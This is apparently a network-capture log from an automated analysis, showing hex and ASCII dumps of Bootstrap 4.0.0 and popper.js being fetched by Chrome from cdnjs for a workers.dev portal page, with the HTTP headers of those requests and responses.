                                                                      2024-03-28 23:21:04 UTC413INData Raw: 37 62 66 38 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                      Data Ascii: 7bf8/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28
                                                                      Data Ascii: rts","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 29 7b 74 28 6e 29 2e 74 72 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c 65 6d 65 6e 74 28 6f 29 3f 22
                                                                      Data Ascii: ){t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isElement(o)?"
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 28 75 2e 43 4c 4f 53 45 29 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e
                                                                      Data Ascii: (u.CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._destroyElemen
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 76 65 43 6c 61 73 73 28 43 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62
                                                                      Data Ascii: veClass(C)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element.setAttrib
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 22 2b 69 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 79 3d 7b
                                                                      Data Ascii: "+i,MOUSELEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item-prev",y={
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64 28 79 2e 41 43 54 49 56 45 5f
                                                                      Data Ascii: nterval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find(y.ACTIVE_
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d 2c 43 2e 5f 67 65 74 49 74 65
                                                                      Data Ascii: extarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)},C._getIte
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 67
                                                                      Data Ascii: relatedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).removeClass(g
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73 65 22 2c 6e 3d 22 62 73 2e 63
                                                                      Data Ascii: unction(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collapse",n="bs.c


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.449746104.17.24.144434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:04 UTC701OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                      Host: cdnjs.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      Origin: https://portal.bakfar.workers.dev
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: script
                                                                      Referer: https://portal.bakfar.workers.dev/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-03-28 23:21:04 UTC960INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Mar 2024 23:21:04 GMT
                                                                      Content-Type: application/javascript; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Access-Control-Allow-Origin: *
                                                                      Cache-Control: public, max-age=30672000
                                                                      ETag: W/"5eb03fa9-4af4"
                                                                      Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                      cf-cdnjs-via: cfworker/kv
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      Timing-Allow-Origin: *
                                                                      X-Content-Type-Options: nosniff
                                                                      CF-Cache-Status: HIT
                                                                      Age: 490180
                                                                      Expires: Tue, 18 Mar 2025 23:21:04 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s4B72XDfijmPty0yNYgORL2taFREU9RkFX9Z5x9KfxhH%2FfDcMhlxrRy0A%2FkyUgVj34I5%2BYminvJFYJQ1SrjRtV3EPLt%2BGT9O4EXG87fIZ62p4Jxt3523pQGaq9vrSFf1E2XB4Wlu"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                      Strict-Transport-Security: max-age=15780000
                                                                      Server: cloudflare
                                                                      CF-RAY: 86bb5ab9396f9c3c-IAD
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-03-28 23:21:04 UTC409INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                      Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e 74
                                                                      Data Ascii: =e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62 6f 72 64
                                                                      Data Ascii: {var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['bord
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 70 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75 72
                                                                      Data Ascii: p:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}retur
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77 69
                                                                      Data Ascii: ght:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.wi
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 65 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74 61
                                                                      Data Ascii: e.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={insta
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73 73
                                                                      Data Ascii: is.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{pass
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74
